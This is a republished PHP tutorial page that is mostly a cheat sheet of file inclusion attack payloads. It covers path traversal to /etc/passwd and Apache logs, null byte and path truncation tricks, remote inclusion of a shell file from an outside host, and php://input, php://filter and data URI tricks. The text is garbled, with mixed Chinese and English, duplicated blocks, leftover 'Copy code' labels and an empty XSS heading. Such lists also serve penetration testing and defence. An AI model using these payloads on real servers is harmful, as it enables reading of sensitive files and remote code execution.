Home > Backend Development > PHP Tutorial > About PHP files containing some vulnerability analysis_PHP tutorial

About PHP files containing some vulnerability analysis_PHP tutorial

WBOY
Release: 2016-07-13 17:10:33
Original
1298 people have browsed it

The article briefly analyzes a vulnerability in inlcude when php files are included. I hope it will be of some use to everyone.

Basic file inclusion vulnerability:

 代码如下 复制代码

* 包含同路径下的文件:
?file=.htaccess
* 路径遍历:
?file=../../../../../../../../../var/lib/locate.db
(该文件非常有趣因为它允许你搜索文件系统)
* 包含注入PHP代码的文件:
?file=../../../../../../../../../var/log/apache/error.log
(you can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.)

Restricted local files include:

 代码如下 复制代码
 
* 空字符注入(Null Byte Injection):
?file=../../../../../../../../../etc/passwd%00
(需要magic_quotes_gpc=off)
* 列目录(Null Byte Injection):
?file=../../../../../../../../../var/www/accounts/%00
(仅限BSD, 需要magic_quotes_gpc=off,详细信息here)
*路径截断(Path Truncation):
?file=../../../../../../../../../etc/passwd........... …
(详细信息参见 here 和 here)
* 点号截断:
?file=../../../../../../../../../etc/passwd……………. …
(仅限Windows, 更多细节参见 here)

Basic remote files include:

The code is as follows Copy code
 代码如下 复制代码


* 包含远程代码(Including Remote Code):

?file=[http|https|ftp]://websec.wordpress.com/shell.txt

(需要 allow_url_fopen=On 和 allow_url_include=On)

* 使用php输入流(Using PHP stream php://input):

?file=php://input
(specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On)

* 使用PHP过滤函数(Using PHP stream php://filter):
?file=php://filter/convert.base64-encode/resource=index.php
(lets you read PHP source because it wont get evaluated in base64. More details here and here)
* Using data URIs:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(需要 allow_url_include=On)


* Including Remote Code:
 代码如下 复制代码
?file=http://127.0.0.1/path/xss.php?xss=phpcode
(makes sense if firewalled or only whitelisted domains allowed)
?file=[http|https|ftp]://websec.wordpress.com/shell.txt (requires allow_url_fopen=On and allow_url_include=On) * Using PHP stream php://input: ?file=php://input
(specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On) * Using PHP stream php://filter:
?file=php://filter/convert.base64-encode/resource=index.php
(lets you read PHP source because it wont get evaluated in base64. More details here and here)
* Using data URIs:
?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=
(requires allow_url_include=On)
* For cross-site scripting attacks (Using XSS):

Restricted remote file inclusion vulnerability

 代码如下 复制代码

* ?file=http://websec.wordpress.com/shell
* ?file=http://websec.wordpress.com/shell.txt?
* ?file=http://websec.wordpress.com/shell.txt%23
(需要 allow_url_fopen=On 和 allow_url_include=On)

Static remote file inclusion vulnerability:

* Man In The Middle attack(Man In The Middle) (lame indeed, but often forgotten)
The code is as follows
 代码如下 复制代码


* 中间人攻击(Man In The Middle)
(lame indeed, but often forgotten)

Copy code


From Reiners’ Weblog. http://www.bkjia.com/PHPjc/629654.htmlwww.bkjia.com
true
http: //www.bkjia.com/PHPjc/629654.html
TechArticleThe article briefly analyzes a vulnerability in inlcude when php files are included. I hope it will be of some use to everyone. Basic file inclusion vulnerability: The code is as follows Copy the code ?php inclu...
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template